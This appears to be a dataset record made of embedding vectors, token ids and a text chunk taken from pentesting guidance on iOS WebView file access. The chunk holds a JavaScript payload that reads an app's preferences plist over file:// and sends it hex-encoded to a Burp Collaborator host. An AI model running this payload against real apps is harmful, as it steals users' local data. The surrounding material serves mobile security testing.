0.5541221499443054, 0.2957508862018585, -0.20760579407215118, -0.3398936688899994, -0.2671893239021301, -0.08452858775854111, 0.18625277280807495, 0.798332154750824, 1.057619571685791, 0.2236865758895874, -0.2973501980304718, 0.13660043478012085, 0.21774469316005707, 0.11704305559396744, -0.09480452537536621, 0.40215495228767395, 0.2681289613246918, 0.4846906363964081, 0.3333154320716858, 0.6076427698135376, 0.234998881816864, 0.2187834233045578, -0.26397350430488586, 0.32944780588150024, 0.4678707420825958, 0.0012072016252204776, -0.27666664123535156, 0.9469817280769348, 0.5684036612510681, 0.2637006938457489, 0.44037869572639465, 0.20789700746536255, -0.2965291440486908, 0.04018556326627731, 0.0662933960556984, 0.451263964176178, -0.12610988318920135, 0.3790064752101898, 0.7549211382865906, -0.1882573813199997, -0.5790317058563232, -0.12906329333782196, 0.5899436473846436, 0.7661141157150269, -0.36160629987716675, -1.077379584312439, 0.04362407699227333, 0.16564586758613586, 0.1049218624830246, 0.10619303584098816, 0.37642496824264526, 0.33801379799842834, 0.08060985058546066, 0.34835293889045715, -0.31469202041625977, -0.935853123664856, -0.6512867212295532, 0.5190162062644958, -1.1655051708221436, -0.24822522699832916, -1.3192280530929565, -0.2195119708776474, 0.09029286354780197, -0.5892512798309326, 0.6793180108070374, -0.35647422075271606, -0.11859853565692902, 0.0329822301864624, -0.11780029535293579, -0.051346201449632645, 0.17572928965091705, 0.2947371304035187, -1.328570008277893, 0.07363404333591461, -0.04095007851719856, 0.5999667644500732, -0.3248599171638489, -0.08473534882068634, -1.060880422592163, 0.037466444075107574, -0.3428283929824829, 0.17511342465877533, 0.6603131294250488, 0.08287902176380157, -0.5317619442939758, -0.3772931694984436, 0.2503722906112671, -0.43104320764541626, -0.1928749829530716, 0.5504236817359924, -0.4134693145751953, 0.4023726284503937, 0.0068818992003798485, 0.12095406651496887, 0.6314522624015808, 0.35484105348587036, -0.26374930143356323, 0.4388730227947235, 0.19700470566749573, 1.1265138387680054, -0.2595936357975006, 0.3506593406200409, 0.4207492172718048, 0.6008106470108032, 0.1891816407442093, 0.11224345862865448, -0.019399072974920273, -0.4290505349636078, -0.13946345448493958, -0.21994559466838837, 0.013245839625597, 0.5823584794998169, -0.6244319677352905, -1.031343698501587, -0.30120307207107544, -0.6130412817001343, -0.6382773518562317, -0.7760733962059021, 0.08949845284223557, 0.6717877984046936, 0.20731687545776367, 0.455280601978302, 0.47009074687957764, -0.8363900184631348, -0.04588603228330612, -0.12059024721384048, -0.1696769744157791, -0.8344306349754333, 0.5960947871208191, -0.010774229653179646, -0.25985631346702576, 0.31326013803482056, 0.32606053352355957, -0.12455029785633087, 0.1473313570022583, -0.3880745470523834, 0.06439387798309326, -0.10971613228321075, 0.18068498373031616, 0.014434131793677807, 0.19411484897136688, 0.45874086022377014, -0.5948642492294312, 0.20983806252479553, -0.08864399045705795, 0.45382294058799744, 1.0118777751922607, 0.36218973994255066, -0.10445918142795563, -0.4142720103263855, 0.18180087208747864, -0.3332413136959076, 0.22077475488185883, -0.04784180223941803, 0.5693491697311401, -0.2665690779685974, 0.4070766866207123, -0.5195518136024475, 0.2728594243526459, 0.6668320894241333, 0.16232115030288696, -0.7928789854049683, 0.7088445425033569, -0.04340153560042381, 0.4717313349246979, -0.6571410894393921, -0.36444494128227234, -0.21882806718349457, 0.1037396714091301, 0.8663851618766785, -0.12276021391153336, 0.11618094891309738, -0.13248570263385773, -0.2319955974817276, 0.047476984560489655, 0.017904609441757202, 0.3500848412513733, -0.14740070700645447, 0.2077338695526123, 0.0131943104788661, -1.055954933166504, -1.113696575164795, -0.07243398576974869, 0.7073987126350403, 0.3733487129211426, 0.31446099281311035, 0.40155094861984253, 0.6165592670440674, 0.0691857859492302, 0.3037989139556885, -0.4563835859298706, 0.07838451862335205, -0.7967082262039185, 0.6363024711608887, 0.23309893906116486, 0.04218780994415283, 0.0025543721858412027, -0.2613357901573181, -0.269453227519989, 0.07695896178483963, 0.23230130970478058, 0.5226312279701233, -0.24875235557556152, -0.6317343711853027, 0.6137926578521729, 0.24488909542560577, -0.8872199654579163, -0.23111076653003693, -0.6716362237930298, 0.21182702481746674, 0.6187707185745239, 0.029322341084480286, -0.17822101712226868, -0.783980131149292, 0.7391735911369324, 0.1493668258190155, 0.02279500663280487, 0.03612243011593819, -0.13047276437282562, -0.732836902141571, -0.3994626998901367, 0.7940124273300171, 0.9439475536346436, 0.3854258060455322, -0.03452852740883827, -1.143579125404358, 0.0005331690772436559, 0.0943274274468422, -0.25497281551361084, -0.42819923162460327, -0.4294902980327606, 0.3348235785961151, 0.0221115592867136, 0.38523733615875244, -0.8662307262420654, 0.2650364935398102, 0.017762068659067154, -0.7775598168373108, 1.2048490047454834, -0.334456205368042, 0.15962697565555573, 0.6605973243713379, 0.17345860600471497, -0.3086621165275574, 0.4294443428516388, -0.6877974271774292, -0.04264459013938904, 0.2307090014219284, -0.262037068605423, -0.25921568274497986, -0.1136222779750824, 0.37300047278404236, -0.45640918612480164, -0.3424154818058014, 0.3744262754917145, 0.6404416561126709, 0.5157885551452637, 0.4401116967201233, -0.13104063272476196, -0.7978917956352234, 0.6212279200553894, -1.1150137186050415, 0.3953525125980377, 0.3240247368812561, -0.14331059157848358, -0.18707814812660217, -0.8684910535812378, 0.7260157465934753, -0.21708944439888, 0.16597411036491394, -0.3677555024623871, -0.2654925584793091, 0.17781628668308258, -0.23257555067539215, 0.06724772602319717, 0.703726589679718, 0.5248535871505737, 0.06831315904855728, -0.4235877990722656, -0.5183292031288147, -0.3240330219268799, -0.7427882552146912, -0.14214514195919037, -0.07171906530857086, 0.24624086916446686, -0.1921069175004959, 1.164170503616333, -0.6654007434844971, 0.044367775321006775, -0.1763925999403, 0.22554823756217957, 0.6769443154335022, -0.9329102635383606, -0.9028751254081726, -0.30608248710632324, -0.0842030867934227, 0.6346616148948669, 0.6027746796607971, -0.040857475250959396, 0.29590967297554016, -0.12128595262765884, 0.5702666640281677, 0.2691137492656708, -0.8302324414253235, 0.1375085562467575, 0.8254892230033875, 0.037915632128715515, -0.43730950355529785, 0.16799379885196686, 0.43307697772979736, -0.22297143936157227, 0.18076398968696594, -0.006730388849973679, -0.5127849578857422, -0.7552099823951721, -0.9223397374153137, 0.10457608103752136, -0.21896249055862427, 0.1106608510017395, 0.07491042464971542, -0.39039483666419983, -0.9643428325653076, 0.9264759421348572, -0.21648265421390533, -0.7236714363098145, 0.23412330448627472, 0.2844630777835846, 0.07282167673110962, -0.08663162589073181, -0.055150263011455536, -0.7470145225524902, -0.7255670428276062, 0.22585316002368927, 0.36842045187950134, 0.014659635722637177, -0.18720990419387817, -0.1961870938539505, 0.09957344084978104, 0.5059765577316284, 0.10041115432977676, -1.119260311126709, -0.2759316861629486, -0.37577736377716064, -0.09420856833457947, -1.0829662084579468, 0.0009880793513730168, -1.0743910074234009, 0.4546631872653961, 0.024038126692175865, 0.012848085723817348, 0.1598464548587799, -0.08367937058210373, 0.13732990622520447, 0.35395607352256775, 0.31241196393966675, -0.9434615969657898, 0.24340511858463287, -0.670496940612793, 0.5075729489326477, 0.06594056636095047, -0.34222111105918884, -0.36631521582603455, 0.12790462374687195, -0.46315622329711914, -0.776544988155365, 0.3252413868904114, -0.0647028386592865, -0.10739915817975998, -0.18968181312084198, -0.210845947265625, 0.294640451669693, -0.2681998312473297, -0.08395136892795563, 0.9584686160087585, -0.4358663856983185, -0.20828188955783844, -0.36320674419403076, 0.5909044146537781, 0.003036467358469963, -0.7191769480705261, -0.17172902822494507, -0.10987371951341629, -0.27657729387283325, -0.25346556305885315, -0.22990967333316803, -0.19153118133544922, -0.8975016474723816, -0.27326276898384094, 0.589451253414154, -0.7567765116691589, 0.4940582811832428, 0.23987992107868195, -0.7336195707321167, -0.31501123309135437, 0.6227904558181763, -0.10154284536838531, -0.20526815950870514, 0.5419676899909973, 0.2915189266204834, 0.4276425540447235, 0.03769344836473465, -0.8336869478225708, -0.23933881521224976, -0.0844256579875946, 0.600156843662262, -0.6696648597717285, -0.06821907311677933, 0.549137532711029, 0.13868847489356995, -0.7884091734886169, -0.5067017078399658, -0.7537674307823181, 0.007969955913722515, 0.32486408948898315, -0.022431328892707825, 0.047294050455093384, 0.18423564732074738, 0.09815011918544769, -0.5194017291069031, 0.5831452012062073, 0.3496917486190796, 0.32504701614379883, -0.021116750314831734, 0.20265506207942963, 0.6843578815460205, 0.012280942872166634, 0.44418367743492126, -0.7081122398376465, -0.6260226368904114, -0.702174723148346, 0.34942230582237244, 0.544675350189209, 0.2521584928035736, 1.2722370624542236, -0.6727124452590942, 0.1573946177959442, -0.3169686496257782, 0.35452234745025635, 1.0476619005203247, -0.03238144889473915, 0.4736524224281311, 0.7290493845939636, 0.41315823793411255, -0.33893299102783203, -0.043760403990745544, 0.8770310282707214, 0.38311508297920227, -0.2968737781047821, -0.6647934913635254, 0.2795611321926117, 0.09333658218383789, 0.1747710406780243, 0.27610912919044495, -0.4233553409576416, -0.3518993556499481, -0.8952471613883972, 0.5100926756858826, 0.21768227219581604, 0.1161072850227356, -0.553109884262085, 0.12645795941352844, -0.33708804845809937, -0.3580211400985718, -0.5555973052978516, 0.3607139587402344, -0.39306512475013733, 0.2748620808124542, -1.0483407974243164, 0.3634317219257355, -0.8930782675743103, -0.6545358896255493, -0.3053327202796936, -0.6132346987724304, -0.08293613791465759, -1.1467735767364502, -0.11304987967014313, -0.28657153248786926, -0.9413149952888489, -0.006199517287313938, -0.2745020389556885, 0.6561737060546875, -0.49896183609962463, -0.334386944770813, 0.38515785336494446, 0.464161217212677, 0.10029887408018112, -0.17469850182533264, 0.416948139667511, 0.25051772594451904, -0.05773668736219406, -0.06553467363119125, -0.033094264566898346, 0.10587067902088165, 0.12374356389045715, 0.18641918897628784, 0.3925279378890991, -0.004758903756737709, 0.06849264353513718, 0.03223945572972298, -1.0297343730926514, -0.13583971560001373, -0.26894113421440125, -0.1082383394241333, 0.16112563014030457, 0.385044127702713, -0.006120030768215656, 0.956501305103302, -0.3450918197631836, 0.25178971886634827, -1.3620169162750244, 0.4983002245426178, 0.8638073801994324, -0.12483465671539307, 0.17763066291809082, 0.39197298884391785, 0.37964749336242676, -0.3717023730278015, -0.18648165464401245, -0.44805487990379333, -0.5664528608322144, -0.074029840528965, -0.2477453500032425, 0.1912727952003479, 0.2512974441051483, 0.24301356077194214, 0.6596066951751709, 0.4306679666042328, 0.1853736788034439, 0.031952377408742905, 0.21921539306640625, 0.0853605717420578, -0.6944617033004761, 0.0021193816792219877, -0.5101406574249268, -0.3511635959148407, 0.6679127812385559, -0.7173053622245789, -0.4970337450504303, -0.793114423751831, -0.3429843485355377, 0.1569637805223465, 0.5939514636993408, -0.2756456732749939, 0.3704678416252136, 0.19599699974060059, -0.5620444416999817, 1.1266517639160156, -0.5597145557403564, -0.31975698471069336, -0.30608150362968445, 0.3796656131744385, -0.4586556553840637, -0.6623304486274719, 0.2739584445953369, 0.5412610769271851, 0.07808374613523483, -0.35397908091545105, -0.34978151321411133, -0.030174333602190018, 0.41505542397499084, 0.40239664912223816, 0.17889781296253204, -0.1390976458787918, -0.5450035929679871, 0.13186225295066833, -0.3841175138950348, -0.3052619695663452, -0.02410615049302578, 0.1308421790599823, 0.48720529675483704, 0.18452398478984833, 0.051809266209602356, -0.2557145953178406, -0.08649667352437973, 0.12863248586654663, 0.319693386554718, 0.5673495531082153, 0.37239325046539307, -0.3342810571193695, 0.25508299469947815, -0.10852736234664917, 0.10343662649393082, 1.2884023189544678, -0.4190501570701599, -0.3288440406322479, 0.8479723334312439, 0.658266544342041, -0.4469270408153534, -0.2250944823026657, 0.25745534896850586, -0.48677900433540344, -0.07671681046485901, -0.2069435715675354, -0.05855587124824524, -0.8138250708580017, 0.24966827034950256, -0.1964685022830963, -0.14123013615608215, -0.2860681712627411, 0.13121436536312103, 0.030440060421824455, -0.5155531764030457, 1.2794488668441772, -0.9457814693450928, 0.8421455025672913, -0.28964173793792725, 0.2895192503929138, 0.42729201912879944, -0.16993965208530426, -0.5120759010314941, 1.0954229831695557, 0.5246338248252869, 0.9121871590614319, 0.002329454058781266, 0.6795724630355835, -0.5733872056007385, 0.3526515066623688, 0.2622731328010559, -0.6150867938995361, -0.9809834361076355, 0.17572835087776184, -0.12632618844509125, -0.5383127331733704, -0.7402686476707458, 0.110151007771492, 0.505844235420227, 0.02487102337181568, 0.6602078080177307, -0.238716721534729, -0.1791507452726364, -0.3688468337059021, -0.1495104283094406, -0.4943643808364868, -0.009802148677408695, 0.4320298731327057, -0.15316356718540192, -0.908717930316925, 0.7119950652122498, 0.0159243643283844, 0.013496804982423782, -0.591245174407959, 0.48430633544921875, 0.47150662541389465, 0.9182430505752563, -0.03503144904971123, -0.2560975253582001, -0.509638249874115, 0.5177475214004517, -0.3329196572303772, -0.043255243450403214, 0.027535080909729004, -0.9263479113578796, -0.18656501173973083, 0.2541276812553406, -0.7250171303749084, -0.6853008270263672, -0.212519109249115, -0.32505273818969727, -0.7520845532417297, 0.6436080932617188, -0.27841585874557495, -0.376094251871109, -0.014082938432693481, -0.07908640801906586, -1.1082093715667725, 0.43769553303718567, -0.3871970474720001, 0.18094174563884735, -0.29489609599113464, 0.07914242148399353, -0.16630685329437256, 0.2856346368789673, -0.7689311504364014, 0.06278517097234726, 0.3656192421913147, -0.632179856300354, -0.8366103172302246, 0.372320294380188, 0.22887757420539856, 0.11069808900356293, 0.8660051226615906, 0.4361291527748108, 0.2752905488014221, 0.10859814286231995, -1.0190199613571167, -0.39149758219718933, 0.3404226303100586, 0.5421736836433411, -0.07705829292535782, 1.4815062284469604, 0.4197649657726288, -0.3127421438694, 0.34997835755348206, -0.16492816805839539, 0.7681053280830383, 0.26693761348724365, -0.8023185729980469, -0.7652969360351562, -0.1436493694782257, -0.3279883861541748, -0.5073975920677185, 0.07721906900405884, 0.12683914601802826, -0.9002583622932434, -0.7628542184829712, -0.7773712277412415, 0.3876397907733917, -0.18244598805904388, 0.680465817451477, 0.37247493863105774, 0.44283434748649597, 0.21749700605869293, -0.43518102169036865, 0.2931317687034607, -1.5375083684921265, 4.3279194831848145, -0.19822341203689575, -0.006136520765721798, 0.13600829243659973, 0.5745919346809387, 0.38301199674606323, 1.0595250129699707, -0.5208397507667542, -0.3466932475566864, -0.0020731789991259575, 0.5386221408843994, -0.5415738821029663, 0.45110177993774414, 0.37428638339042664, 0.07774918526411057, 0.4021095633506775, -0.3764326572418213, 0.18467214703559875, -0.026557380333542824, -1.1227823495864868, -0.8977775573730469, -0.18991497159004211, -0.5905542969703674, 0.8524693250656128, 0.2126515805721283, 0.4182405471801758, 0.15211491286754608, -0.9709519743919373, -0.27513691782951355, -0.6597827076911926, -0.10881409794092178, -0.40673771500587463, 0.4695201814174652, 0.353747695684433, -0.7625452280044556, 0.015960542485117912, 0.17666715383529663, -0.8448254466056824, -0.3155781328678131, 0.36407890915870667, -0.47673964500427246, -0.61444091796875, -0.002530500292778015, -0.6476463079452515, 0.0038479610811918974, 0.7183987498283386, -0.19069942831993103, 0.17891383171081543, 1.0828344821929932, -0.16472189128398895, 0.9612483382225037, 0.2564857304096222, 0.5291098356246948, -0.6498311758041382, -0.16987192630767822, 0.178483784198761, 0.250278502702713, -0.04163316637277603, -0.1591475009918213, -0.021438004449009895, 0.7983139753341675, -0.24659773707389832, 0.011049676686525345, -0.11170542985200882, -0.821978747844696, 0.3087778687477112, -0.32127684354782104, 0.8370411992073059, 0.2632801830768585, 0.03223622590303421, -0.11415544152259827, -0.16675828397274017, -0.2901467978954315, -0.4264601171016693, 0.5285540223121643, 0.18180251121520996, 0.15522471070289612, 0.4683029353618622, 0.6800560355186462, -0.7478140592575073, -0.18209345638751984, -0.46221107244491577, -0.31574931740760803, 0.2187906950712204, 0.7672834396362305, 0.7216920256614685, -0.35064783692359924, -0.7770894765853882, -0.1942702829837799, 0.5092805027961731, 0.1991315484046936, 0.19190041720867157, -0.21098898351192474, 0.04078703373670578, 0.36252760887145996 ]
[ 2024, 2800, 2008, 2024, 2108, 10009, 1999, 1037, 4773, 8584, 2006, 16380, 1010, 2005, 2742, 1024, 8299, 1006, 1055, 1007, 1024, 1013, 1013, 5371, 1024, 1013, 1013, 10093, 1024, 1013, 1013, 4773, 8584, 2015, 2064, 7170, 6556, 4180, 2013, 2019, 2203, 8400, 1010, 2021, 2027, 2064, 2036, 7170, 2334, 4180, 2013, 1996, 10439, 2951, 14176, 1012, 2065, 1996, 2334, 4180, 2003, 8209, 1010, 1996, 5310, 5807, 1005, 1056, 2022, 2583, 2000, 3747, 1996, 5371, 18442, 2030, 1996, 4130, 2109, 2000, 7170, 1996, 5371, 1010, 1998, 5198, 5807, 1005, 1056, 2022, 2583, 2000, 10086, 1996, 8209, 5371, 1012, 4773, 8584, 4180, 7170, 10179, 8545, 2497, 8584, 1024, 2009, 2064, 2224, 2139, 28139, 12921, 4725, 7170, 11039, 19968, 3367, 4892, 1024, 2918, 3126, 2140, 1024, 2030, 7170, 2850, 2696, 1024, 2771, 11368, 18863, 1024, 3793, 2368, 3597, 4667, 18442, 1024, 2918, 3126, 2140, 1024, 2000, 7170, 4180, 1012, 1059, 2243, 8545, 2497, 8584, 1024, 2009, 2064, 2224, 1996, 4725, 7170, 11039, 19968, 3367, 4892, 1024, 2918, 3126, 2140, 1024, 2030, 7170, 2850, 2696, 1024, 2771, 11368, 18863, 1024, 3793, 2368, 3597, 4667, 18442, 1024, 2918, 3126, 2140, 1024, 2000, 7170, 2334, 16129, 6764, 1998, 7170, 2890, 15500, 1024, 2005, 4773, 4180, 1012, 4050, 1010, 1996, 2334, 6764, 2024, 8209, 1999, 5257, 2007, 4725, 2164, 1010, 2426, 2500, 1024, 4130, 29278, 6072, 8162, 3401, 1024, 1997, 13874, 1024, 1010, 24471, 10270, 2953, 6072, 8162, 3401, 1024, 2007, 10288, 29048, 1024, 2030, 1999, 4183, 1006, 8417, 11253, 1024, 17181, 1024, 1007, 1012, 1999, 2804, 1010, 2017, 2323, 2036, 20410, 2065, 1996, 10439, 2003, 2478, 1996, 4118, 7170, 8873, 2571, 3126, 2140, 1024, 4352, 16416, 2850, 9468, 7971, 21163, 2140, 1024, 1012, 2049, 2034, 16381, 2003, 24471, 2140, 1998, 3397, 1996, 24471, 2140, 2000, 2022, 8209, 1999, 1996, 4773, 8584, 1010, 2049, 2117, 16381, 4352, 16416, 2850, 9468, 7971, 21163, 2140, 2089, 5383, 1037, 2309, 5371, 2030, 1037, 14176, 1012, 2065, 4820, 1037, 2309, 5371, 1010, 2008, 5371, 2097, 2022, 2800, 2000, 1996, 4773, 8584, 1012, 2174, 1010, 2065, 2009, 3397, 1037, 14176, 1010, 2035, 6764, 2006, 2008, 14176, 2097, 2022, 2081, 2800, 2000, 1996, 4773, 8584, 1012, 3568, 1010, 2009, 2003, 4276, 29508, 2023, 1998, 1999, 2553, 2009, 2003, 1037, 14176, 1010, 20410, 2075, 2008, 2053, 7591, 2951, 2064, 2022, 2179, 2503, 2009, 1012, 2065, 2017, 2031, 1996, 3120, 3642, 2017, 2064, 3945, 2005, 2216, 4725, 1012, 2383, 1996, 9227, 12441, 2017, 2064, 2036, 3945, 2005, 2122, 4725, 1024, 1002, 10958, 8428, 2475, 1011, 1062, 2480, 1012, 1013, 2073, 6491, 2100, 12618, 9333, 2121, 1064, 24665, 13699, 1011, 1045, 1000, 7170, 11039, 19968, 3367, 4892, 1000, 20304, 1014, 2595, 8889, 2692, 2475, 20952, 2575, 2278, 2484, 1006, 1018, 1012, 1035, 1035, 3793, 1012, 1035, 1035, 27885, 3501, 2278, 1035, 2777, 7295, 14074, 1007, 2004, 6895, 2072, 7170, 11039, 19968, 3367, 4892, 1024, 2918, 3126, 2140, 1024, 5371, 3229, 10179, 8545, 2497, 8584, 1024, 1996, 5371, 1024, 1013, 1013, 5679, 2003, 2467, 9124, 1012, 5371, 3229, 2013, 5371, 1024, 1013, 1013, 24471, 4877, 2003, 2467, 9124, 1012, 5415, 3229, 2013, 5371, 1024, 1013, 1013, 24471, 4877, 2003 ]
hack_tricks
435.txt
4
always enabled. if you retrieve the effective origin from a uiwebview where baseurl is also set to nil you will see that it is not set to " null ", instead you'll obtain something similar to the following : applewebdata : / / 5361016c - f4a0 - 4305 - 816b - 65411fc1d780. this origin " applewebdata : / / " is similar to the " file : / / " origin as it does not implement same - origin policy and allow access to local files and any web resources. exfiltrate _ filestring. prototype. hexencode = function ( ) { var hex, i ; var result = " " ; for ( i = 0 ; i < this. length ; i + + ) { hex = this. charcodeat ( i ). tostring ( 16 ) ; result + = ( " 000 " + hex ). slice ( - 4 ) ; } return result } var xhr = new xmlhttprequest ( ) ; xhr. onreadystatechange = function ( ) { if ( xhr. readystate = = xmlhttprequest. done ) { var xhr2 = new xmlhttprequest ( ) ; xhr2. open ('get ','http : / / 187e2gd0zxunzmb5vlowsz4j1a70vp. burpcollaborator. net /'+ xhr. responsetext. hexencode ( ), true ) ; xhr2. send ( null ) ; } } xhr. open ('get ','file : / / / var / mobile / containers / data / application / ed4e0ad8 - f7f7 - 4078 - 93cc - c350465048a5 / library / preferences / com. authenticationfailure. wheresmybrowser. plist ', true ) ; xhr. send ( null ) ; wkwebview : allowfileaccessfromfileurls ( wkpreferences, false by default ) : it enables javascript running in the context of a file : / / scheme url to access content from other file : / / scheme urls. allowuniversalaccessfromfileurls ( wk
[ 0.09286529570817947, -0.577025294303894, -0.22786131501197815, 0.09285648167133331, -0.2825518548488617, -0.012616295367479324, -0.20746514201164246, -0.12256977707147598, 0.5456156730651855, 0.6762797236442566, 0.5116654634475708, -0.19515123963356018, 0.3442809283733368, 0.1656608134508133, -0.7502234578132629, -0.7319240570068359, -0.6320441365242004, 0.09702090173959732, -0.4864664375782013, -0.16632547974586487, 0.5240710377693176, 0.29383111000061035, -0.9445937871932983, -0.9262140393257141, -0.14219510555267334, 0.7540045380592346, 0.7875266671180725, 0.06346769630908966, 0.9101960062980652, 0.5655906796455383, -0.19080422818660736, -0.4576171040534973, -0.2400568425655365, -0.579200804233551, 0.23284384608268738, 0.032789405435323715, 0.4194299876689911, -0.4774954617023468, -0.08108057081699371, -0.9516901969909668, 0.3062760829925537, -0.48422372341156006, -0.37552204728126526, -0.39058026671409607, -0.49480757117271423, -0.44947096705436707, -0.13364872336387634, -0.39028286933898926, 0.10027290135622025, -0.27940207719802856, 0.46123629808425903, 0.2558400630950928, 0.0690087378025055, -0.3739379942417145, 0.43346166610717773, 0.16336587071418762, -0.07841958105564117, 0.033084236085414886, -0.5479412078857422, 0.38764432072639465, -0.5373862981796265, 0.24631373584270477, 0.5248569250106812, -0.6499882936477661, 0.07756929099559784, 0.29711782932281494, 0.13332796096801758, -0.5283474326133728, 0.12487203627824783, 0.11968075484037399, -0.5244178175926208, 0.3733038008213043, -0.7613535523414612, -0.5715424418449402, -0.6285518407821655, -0.1775248646736145, -0.3843626379966736, -0.25797930359840393, 0.04623161628842354, 0.5943241715431213, -0.021219929680228233, 0.9238430261611938, 0.17148052155971527, -0.36630725860595703, -1.0244959592819214, -0.21110743284225464, 0.42996445298194885, 0.6796001195907593, -0.6649218797683716, 0.4330465793609619, 0.11257230490446091, 0.36604204773902893, -0.7514841556549072, -0.5302363038063049, -0.11035115271806717, 0.7956961393356323, -0.03145747631788254, -0.07341175526380539, -0.33854374289512634, -0.1792379915714264, 0.7556117177009583, 0.6292991638183594, -0.42475059628486633, 0.09568174928426743, -0.4770224094390869, 0.47371765971183777, 0.3324287235736847, -0.340384840965271, -0.5421875715255737, -0.4257163405418396, 0.6349387168884277, -0.23772747814655304, 0.5578901171684265, -0.6025372743606567, 0.06902474164962769, 0.6247779130935669, 0.21008719503879547, 0.10773119330406189, -0.38921380043029785, 0.44456616044044495, 0.05728517472743988, 0.003437156556174159, 0.11679984629154205, 0.05984634906053543, 0.006222907919436693, 0.04798876494169235, 0.43199679255485535, 0.23679234087467194, -0.616595983505249, -0.3942716121673584, -0.1589074581861496, -0.556649386882782, 0.02314084582030773, 0.45431485772132874, -0.5091744661331177, 0.5206689238548279, 0.3397223651409149, 0.5866409540176392, 0.23624171316623688, -0.991288423538208, 0.07283567637205124, 0.2826252579689026, 0.007877792231738567, 1.2360466718673706, 0.20960934460163116, 0.1279778629541397, -0.5240543484687805, -0.2759915888309479, -0.5536579489707947, -0.0013124614488333464, -0.10875803977251053, 0.11291276663541794, 0.9376711249351501, 0.1539556235074997, -0.37491583824157715, 0.0779668539762497, -0.2355087399482727, 0.11948550492525101, 0.22810329496860504, -0.037201035767793655, -0.3411736786365509, 1.2130581140518188, -0.16325481235980988, 0.46529585123062134, -0.6037225127220154, 0.1485949605703354, -0.4025900661945343, -0.4013414978981018, -0.34036388993263245, -0.16901688277721405, 0.18308939039707184, 0.49311110377311707, -0.2078898847103119, 0.5190205574035645, 0.9675251245498657, 0.6702051162719727, -0.04064022749662399, -0.28407061100006104, 0.56313556432724, 0.599506139755249, -0.126627117395401, 0.6159020066261292, 0.23402036726474762, 0.8416739106178284, -0.4004264771938324, -0.008159550838172436, -0.07950171083211899, -0.9688760638237, 0.11398784816265106, -0.397440105676651, -0.09794581681489944, 0.5781599283218384, -0.26789572834968567, 1.4567054510116577, 0.36569035053253174, 0.4044695198535919, -0.7806686758995056, -0.5956739187240601, -0.1745666116476059, -1.4886388778686523, -0.35150301456451416, 0.04324899986386299, 0.1582115888595581, 0.3457644283771515, -0.3086509704589844, -0.5371897220611572, 0.9767314195632935, 0.542860746383667, 0.010826251469552517, 0.3692019581794739, 0.6478277444839478, 0.06946622580289841, -0.0810721218585968, 0.31799355149269104, 0.14625416696071625, 0.014477919787168503, -0.13934487104415894, 0.42100074887275696, 0.16951029002666473, 0.3924757242202759, 0.13089485466480255, 0.4668320119380951, 0.4006301760673523, 0.7580051422119141, -0.16714274883270264, -0.3073561191558838, 0.48483747243881226, 0.6087118983268738, -0.9923554062843323, 0.02849624864757061, 0.24400801956653595, 0.26068827509880066, 0.44742321968078613, 0.8587505221366882, -0.02949225716292858, -0.14785803854465485, 0.006661208346486092, 0.6251888275146484, -0.15065522491931915, 0.3466552793979645, 0.25508132576942444, 0.8493087291717529, 0.9806883335113525, 0.05488774552941322, 0.010448611341416836, -0.003938225097954273, -0.22408883273601532, 0.5674276351928711, 0.29560789465904236, 1.0081989765167236, 0.5668068528175354, 0.5318756103515625, 0.9289202094078064, -0.054794792085886, -0.57156902551651, -0.42107638716697693, 0.6368292570114136, 0.8711035847663879, -0.6106107234954834, -0.6135149598121643, -0.38424304127693176, 0.28774207830429077, -0.616247296333313, -0.2721748948097229, 0.28593096137046814, 0.7886203527450562, 0.0015942954923957586, -0.018360668793320656, -0.22675958275794983, -1.0142381191253662, -0.6879045367240906, -0.4497731029987335, -0.6217034459114075, -0.4350898861885071, -1.5519121885299683, -0.14632387459278107, 0.7429160475730896, -0.7168344259262085, 0.7960673570632935, -0.16135428845882416, 0.03038676828145981, 0.785001277923584, -0.2378443032503128, 0.392121821641922, -0.4836651682853699, -0.10561291128396988, -0.567610502243042, 0.38201838731765747, 0.29841431975364685, 0.6307222843170166, -0.19574496150016785, 0.010934337973594666, -0.1910504847764969, -0.2646135091781616, -0.0194630678743124, 0.1659906953573227, 1.1066229343414307, 0.4539893567562103, -0.10486001521348953, -0.5596294403076172, 0.2935527563095093, -0.24141471087932587, 0.2139197438955307, 0.21324020624160767, -0.7315173149108887, 0.45564523339271545, 0.22978925704956055, -0.02164163999259472, 0.33810827136039734, 0.464853435754776, -0.4798576831817627, 0.5223220586776733, -0.11981266736984253, 0.3962898552417755, -0.6081331372261047, 0.7471807599067688, 0.17433035373687744, 0.4621866047382355, -0.2364063262939453, -0.3385593295097351, 0.12488606572151184, -0.43302544951438904, -0.11722445487976074, -0.4483913779258728, -0.3315558135509491, 0.49763670563697815, 0.08539362996816635, -1.2795569896697998, 0.649439811706543, -0.6566584706306458, -0.41569676995277405, -0.4223227798938751, -0.19495415687561035, 0.9628190994262695, 0.08205331116914749, 0.034046731889247894, 0.22418983280658722, -0.19444206357002258, 0.5241956114768982, -0.10634081810712814, 0.13885442912578583, -0.7172942161560059, 0.48702216148376465, 0.28407803177833557, 0.08545894920825958, 0.6112182140350342, 0.009445100091397762, -0.3980761170387268, 0.01392146572470665, -0.40972915291786194, -0.054880961775779724, -0.29664573073387146, 0.4738541841506958, 0.26634472608566284, 0.22087687253952026, 0.6026577353477478, -0.3008827567100525, -0.353498637676239, -0.27642837166786194, -0.2926776707172394, 0.8299823999404907, -0.1318223625421524, -0.32275426387786865, 0.07777219265699387, -0.12195368856191635, -1.0173180103302002, 0.22510312497615814, 0.0549834668636322, 0.5360389351844788, -0.28114309906959534, 0.43579357862472534, -0.44256043434143066, -0.12338996678590775, 0.44096535444259644, 0.12296605855226517, -0.6592131853103638, 0.6003618240356445, 0.18161854147911072, 0.553663432598114, -0.206122487783432, 0.6935285925865173, -0.03208674117922783, -0.30062612891197205, 0.6491210460662842, -0.1241668313741684, 0.10860373079776764, -0.4123985469341278, -0.30991438031196594, -0.04177356883883476, -0.35438698530197144, 0.2696465253829956, -0.4949588179588318, 0.5362094044685364, -0.4235486090183258, -0.7552219033241272, -1.074600100517273, 0.3385924994945526, 0.6685245633125305, 0.44065093994140625, 0.024465566501021385, 1.018080472946167, 0.3140091598033905, -0.24670515954494476, 0.2515648603439331, -0.2776021659374237, 0.5017951726913452, -0.33244356513023376, 0.947729766368866, 0.17209778726100922, -0.6432989239692688, -0.1716015785932541, -0.20526212453842163, -0.7483214735984802, -0.37224945425987244, -0.14301393926143646, 0.4525330066680908, -0.519572913646698, -0.4907958209514618, 0.2492683082818985, 0.3391915261745453, -0.37347277998924255, -0.18506789207458496, -0.023206640034914017, 0.49087169766426086, 0.8557805418968201, 